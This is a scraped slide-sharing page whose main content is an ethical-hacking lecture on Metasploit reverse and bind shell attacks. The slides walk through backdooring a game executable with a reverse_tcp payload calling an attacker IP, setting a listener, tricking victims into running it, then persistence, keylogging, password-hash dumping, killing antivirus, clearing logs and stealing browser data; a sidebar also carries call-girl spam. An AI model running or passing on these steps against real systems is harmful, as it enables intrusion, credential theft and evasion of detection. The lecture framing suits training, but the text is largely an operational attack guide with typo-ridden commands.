সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ
সাইবার নিরাপত্তা বিষয়ক ওয়ার্কশপ
 
Workshop on Cyber security and investigation
Workshop on Cyber security and investigationWorkshop on Cyber security and investigation
Workshop on Cyber security and investigation
 
Remote control system (rcs)
Remote control system (rcs)Remote control system (rcs)
Remote control system (rcs)
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensics
 

Recently uploaded

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 

Recently uploaded (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 

Cyber Security and Ethical hacking 16

  • 1. Cyber Security & Ethical Hacking By Mehedi Hasan Lecture 16: Reverse & Bind Shell Attacks
  • 2. Meterpreter Exploit: Exploit is the process of taking advantage of security loophole on the victim’s computer to gain illegal access. Payloads: Payload is the code that an attacker executes on the victims computer once the system has been compromised. Reverse Shell payload is an example. Post Explanation Attack: Once a system has been compromised the attacker executed against it to control. Listener: Listener is code that runs on the attackers computer & wait for an incoming connection from victims computer. Poet Explanation Attacks Important Terminology
  • 3. Shell A shell is a command line interface on a systemm that allows user to interface with the system by sending it text commands. For example. Command line prompt in windows and Terminal in Kali Linux.
  • 4. Reverse Shell Attack Reverse Shell attacks are attacks that force the victims computer to connect back to the criminal and provide the criminal with remote shell access to it. Reverse shell attacks also have the additional advantage that they allow the criminal to connect to the victim, even if the victim is behind a firewall or has an internal IP address. This is true since in case of a remote shell attack it is an outgoing connection instead of an incoming connection. Typically in a reverse shell attach, the criminal has to follow below steps. Step 1: Infect a regular file with a payload (msf) Step 2: Open a port on criminals computer and listen for any incoming connections from the victim (msf) Step 3: Send the infected file to the victim and somehow get them executed file (Social Engineering)
  • 5. Meterpreter • Introductions: Meterpreter is a tool which is a part of Metasploit and allows the attacker to communicate with the victims system after it has been exploited. The best part about meterpreter is that it will run from the memory by attaching itself to a process on the victims computer and does not create any file on it. Post Explanation Attacks
  • 6. Merterpreter Reverse Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infect with exploit code and payload. (exe, pdf, doc, xls) Step 2: listener Launce listener on your computer. Step 3: Explanation Send infected file to victim and somehow make execute. Step 4: Shell Access Wait for remote shell connection to get established between victim and attacker. Step 4: Post Explanation Control the victims computer with post explanation script
  • 7. Merterpreter Post Explanation Attacks Step 1: Backdoor file (msf) msfpayload windows/meterpreter/reverse_tec LHOST=192.168.100.15, LPORT=4444 >/root/desktop/nfs.exe Step 2: Listener use exploit/multi/handler set payload windows/meterpreter/revers_tcp set LHOST=192.168.100.15 exploit Step 3: Explanation (Social Engineering) Step 4: Shell Access Get meterepreter shell access Step 5: Post Explanation.
  • 8. Merterpreter Post Explanation Attacks Different ways to get a Meterepreter Session • Send to victim the infected file. • Send to victim the infected PDF/Vulnerability in adobe acrobat on victim • Send a link to victim of a page that exploits a browser Vulnerability. • Send a link to victim of a webpage that exploit a JAVA Vulnerability
  • 9. Remote Shell Attack Using an infected exe file Require Techniques • Victim is running windows 7 • Attacker has metasplait.
  • 10. Merterpreter Post Explanation Attacks Step 1: Hide the reverse shell payload onto say a game like NFS.exe. This reveres shell payload when executed on the victims system will connect back to the attacker on port 4444 on the IP address 192.168.100.15 Msfpaylaod windows/mereterpreter/reverce_tcp LHOST=192.168.100.15, LPORT=4444, >root/desktop/nfs.exe Step 2: Start metasploit and type the following commands to launch the multi handeler module and tell it which payload to expect and on what port. Use exploit/multi/handeler/reverse_tcp set lhost192.168.100.15 Step 3: Metasploit will now start the payload handler, wait for a Reverse shell connection to get established from the victims machine to the attackers on port 4444
  • 11. Merterpreter Post Explanation Attacks Step 4: Somehow send the nfs.exe file to the victim and fool the victim into executing it on the windows 7 system. Step5: you have now successfully managed to connect to The victims computer and a meterpreter session has been Created between attacker and the victim. To double check, type the sysinfo command. Step 6: To get access to the shell prompt on the victims computer, simply type the shell command: shell Step 7: You can now browse the victims computer just as if it were your own computer.
  • 12. Post Exploitation Scripts List of existing scripts available http://dev.metasploit.com/redmine/projects/fr amework/repository/shell-script/metrepreter
  • 14. Meterpreter existing script Display interface information of victims computes ipconfig
  • 15. Meterpreter existing script Display system information of victims computes sysinfo
  • 16. Meterpreter existing script Take a picture using the victims webcam wemcam_list
  • 17. Meterpreter existing script Take a Screenshot of the victims webcam Screenshot
  • 18. Meterpreter existing script Displays list of processes running on victims computer. ps
  • 19. Meterpreter existing script Migrating to some other process: migrate 912 Migrates to the process whose process is 912 in this case explore.exe. Now toy can capture victims keystroke.
  • 20. Meterpreter existing script Start a keylogger on the victims computer Run post/windows/capture/keylog_recorder Starts kelogger on victims system and records all keystrokes
  • 21. Meterpreter existing script Start a Key logger on the victims computer. Keyscan_start Keyscan_dump Keyscan_stop Starts Keylogger on victims computer, Dumps key logger Buffer and then stop key logger
  • 22. Meterpreter existing script Shuts Down or Reboot the victims computers Shutdown Reboots
  • 23. Meterpreter existing script Kill the antivirus of victims computer Run killav
  • 24. Meterpreter existing script Privilege escalation on the victims system Getsystem Tries previlege escalation to give you admin rights on victim system. getuid Tells you which user you are currently logged in as on victim system.
  • 25. Meterpreter existing script Remotely modify the victims registry . reg
  • 26. Meterpreter existing script Dump the password hashes. run hasdump
  • 27. Meterpreter existing script Steal Password Hashes. Getsystem, run hashdump
  • 28. Meterpreter existing script Take over the victims computer. Run scraper Allows you to download all sorts of information from the victim computer.
  • 29. Meterpreter existing script Interactive remote GUI access to victim. Run vnc
  • 30. Meterpreter existing script Control Mouse/Keyboard of victim. Uictl –h, Uictl disable mouse, Uictl enable mouse.
  • 31. Meterpreter existing script Erase log file of victim. clearev
  • 32. Meterpreter existing script Erase log file of victim. Run event_manager -h
  • 33. Meterpreter existing script Post explanation modules
  • 34. Meterpreter existing script View list of wi-fi networks. Run post/windows/wlan/wlan_bss_list
  • 35. Meterpreter existing script Get all stored wi-fi profile. Run post/windows/wlan/wlan_profile
  • 36. Meterpreter existing script View usb history of victim. Run post/windows/gather/usb_history
  • 37. Meterpreter existing script Get Shortcuts from victim. . Run post/windows/gather/dumplinks
  • 38. Meterpreter existing script Stel saved picasa password. Run post/windows/gather/credentials/enum_picasa_pwda
  • 39. Meterpreter existing script Steal browser history, cookies, logindata, bookmarks & preferences Run post/windows/gather/enum_chrome
  • 40. Meterpreter existing script Steal microsoft product keys of victim. Run post/windows/gather/enum_ms_product_keys
  • 41. Remote Shell Attack Once you have successfully got shell access to the victims computer, ideally you want to leave a backdoor open if. Such that you will have easy access to it in the future as well. Meterpreter has a persistance.rb script that launches a meterpreter Service on the victims computer, such that the attacker will be able to access the victims computer even after it has been rebooted. Once you have meterepreter shell access on victim, just type the below Commands. Persistance –h Display all the various option avaiable. Persistance –u –i5 –p 443 –r 192.168.100.1 Now even when the victim shuts down the computer whenever the victim on again then you will have meterpreter shell access to the victim
  • 43. Bind Shell VS Reverse Shell Bind Shell Reveres Shell It is possible to bind an application to a particular port in such a way that whenever a user connects to that port then the user gets shell access to the victim It is possible to create a payload in such a way that, when executed on the victim, it will connect to the attacker and give shell access. Attacker has to connect to the victim on the specified port to get access to the shell. Victim connects back to the attacker giving the attacker a reverse shell code. Easy to detect by firewall. Difficult to detect by firewall.
  • 44. Merterpreter Reverse Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infect with exploit code and payload. (exe, pdf, doc, xls) Step 2: listener Launce listener on your computer. Step 3: Explanation Send infected file to victim and somehow make execute. Step 4: Shell Access Wait for remote shell connection to get established between victim and attacker. Step 4: Post Explanation Control the victims computer with post explanation script
  • 45. Merterpreter Bind Shell Access: Steps Involved Step 1: Backdoor file Backdoor a file and infected with exploit code and payload. (exe, pdf, doc, xls) Step 2: Explanation Send infected file to victim and somehow make execute. Step 3: listener Exploit binds itself to a particular port on the victim and listens for a connection from the attacker. Step 4: Shell Access Attacker connect to the victim on the exploited port. Step 5: Post Explanation Control the victims computer with post explanation script and commands.
  • 46. MSFPAYLOAD Msfpayload –l Display a list of payloads that are possible to bacdoor
  • 47. MSFPAYLOAD Possible to create payloads for both reverse & bind shell attacks
  • 48. Backdooring an EXE file with a payload It is possible to backdoor an EXE file with a payload (reverse or bind shell) with the help of mafpayloads Msfpayload <payload> <LHOST=> <LPORT=> x –o <output file name> For example: Msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.100.12 LPORT=4444 X>/root/desktop/NFS.exe
  • 49. Create Bind Shell Msfpayload windows/meterpreter/bind_tcp LHOST=192.168.100.13 LPORT=666 X>/root/desktop/bind.exe
  • 50. Meterpreter existing script Get Shortcuts from victim. . Run post/windows/gather/dumplinks